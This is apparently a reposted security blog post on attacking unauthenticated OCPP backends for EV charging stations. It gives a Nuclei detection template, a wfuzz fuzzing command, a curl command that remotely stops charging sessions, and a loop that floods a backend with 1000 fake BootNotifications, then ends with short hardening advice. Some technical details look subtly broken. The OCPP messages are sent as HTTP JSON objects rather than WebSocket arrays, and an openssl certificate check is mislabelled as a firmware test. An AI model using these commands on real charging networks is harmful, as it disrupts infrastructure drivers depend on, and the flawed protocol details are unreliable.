Listen to this Post

Continued into EV charging station management systems and OCPP vulnerabilities. After setting up a charging station backend on my machine, I wrote a Nuclei template to detect unauthenticated backends. Key findings include:
– CP ID enumeration
– DoS attacks
– Charging stop commands
– Protocol manipulation
Many systems still lack proper authentication, leaving them vulnerable to exploitation.
You Should Know:
1. Identifying Unauthenticated OCPP Backends
Use Nuclei with a custom template to scan for exposed OCPP backends:
nuclei -t ocpp-auth-check.yaml -u https://target-ev-backend.com -severity high
Example `ocpp-auth-check.yaml`:
id: ocpp-auth-bypass
info:
name: OCPP Unauthenticated Endpoint Detection
author: YourName
severity: high
requests:
- method: POST
path:
- "{{BaseURL}}/ocpp"
headers:
Content-Type: application/json
body: '{"messageType": 2, "action": "BootNotification"}'
matchers:
- type: word
words:
- "status"
- "accepted"
condition: and
2. OCPP Protocol Fuzzing
Use wfuzz to test OCPP parameters:
wfuzz -c -z file,/usr/share/wordlists/payloads.txt -d '{"chargePointId":FUZZ}' -H "Content-Type: application/json" https://target-ev-backend.com/ocpp
3. Charging Session Manipulation
Send unauthorized stop commands (if auth is missing):
curl -X POST https://target-ev-backend.com/ocpp -H "Content-Type: application/json" -d '{"messageType": 2, "action": "RemoteStopTransaction", "transactionId": 123}'
4. DoS Attack Simulation
Flood the OCPP backend with fake BootNotifications:
for i in {1..1000}; do curl -X POST https://target-ev-backend.com/ocpp -H "Content-Type: application/json" -d '{"messageType": 2, "action": "BootNotification"}'; done
5. OCPP 2.0.1/2.1 Security Testing
Check for insecure firmware updates:
openssl s_client -connect target-ev-backend.com:443 | openssl x509 -noout -text | grep -i "issuer|validity"
What Undercode Say
EV charging infrastructure remains a high-risk target due to weak authentication and protocol flaws. Security teams must:
– Enforce TLS 1.3 for OCPP communications.
– Implement certificate pinning in firmware.
– Monitor for anomalous OCPP commands (e.g., unexpected RemoteStart/Stop).
– Use hardened Linux firewalls (iptables/nftables) to restrict OCPP traffic.
Expected Output:
[+] https://target-ev-backend.com/ocpp - Unauthenticated OCPP Endpoint (High) [+] Possible DoS via BootNotification Spam [+] RemoteStopTransaction without Auth
Prediction
As EV adoption grows, OCPP attacks will rise, leading to disrupted charging networks, data theft, and firmware hijacking. Vendors must adopt zero-trust models before large-scale exploits occur.
(Relevant OCPP Security Best Practices)
References:
Reported By: Gagan Bagh – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


